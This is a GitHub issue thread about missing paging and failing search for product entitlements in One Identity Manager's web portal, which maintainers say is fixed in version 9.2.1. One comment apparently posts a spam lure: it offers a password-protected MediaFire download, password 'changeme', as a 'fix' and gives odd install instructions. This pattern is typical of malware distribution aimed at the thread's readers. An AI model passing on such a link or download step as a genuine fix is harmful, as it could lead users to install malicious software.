### ISSUE TITLE
Missing paging for Product Entitlements

### ISSUE THREAD

**Issue by gitpm** [OneIdentity/IdentityManager.Imx#173]
With the Product-entitlements the pagination is missing ( -> see [Link](https://github.com/OneIdentity/IdentityManager.Imx/blob/v92/imxweb/projects/qer/src/lib/itshop/request-info/service-item-detail/product-entitlements/product-entitlements.component.html))

see a possible fix for this problem:
[product-entitlements-paging-solution.zip](https://github.com/user-attachments/files/16759058/product-entitlements-paging-solution.zip)

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by gitpm** [comment]
The open point is that the search does not work with the API. 
The api call is dealing with BaseTreeHasObject, but the Entitlement Targets are SystemRoles, Resources, etc.
Setting e.g.  the ESet/DisplayName  index Weighting to 1 shows no effect in the search result.
Is there a solution for the problem?
 -> Maybe a local search for the data ?

**Comment by hannobunjes** [comment]
Hi,
Can you say which API call is not working with search? Search works fine over an API based on BaseTreeHasObject.

**Comment by gitpm** [comment]
Hi Hanno,

the api-call is:
portal/shop/serviceitems/dfe60940-8cef-4889-a513-961b1674df03/entitlements?PageSize=20

![image](https://github.com/user-attachments/assets/1a86b52e-7ba8-46a5-b4b9-596f572d5fad)

without search:
![image](https://github.com/user-attachments/assets/caddad69-5255-407f-98ec-d2ecd91d66cf)

with Search:
(https://si40v478/ApiServer/portal/shop/serviceitems/dfe60940-8cef-4889-a513-961b1674df03/entitlements?PageSize=20&search=Sprung)
![image](https://github.com/user-attachments/assets/15c9cc28-f6af-472e-a82d-9c58a6a6c446)
-> As you can see the collection is empty.  The DisplayName comes in this case from an Eset/DisplayName

**Comment by hannobunjes** [comment]
Is your installation already on 9.2.1?

**Comment by gitpm** [comment]
No, we have an older version. 9.1 right now. As far I remember I had the same issue with 9.2. 
But I did not test 9.2.1. So we have to install 9.2.1 and works. Is it correct ?

**Comment by hannobunjes** [comment]
Yes, this was fixed for 9.2.1.

**Comment by gitpm** [comment]
Hi Hanno, thx for your input
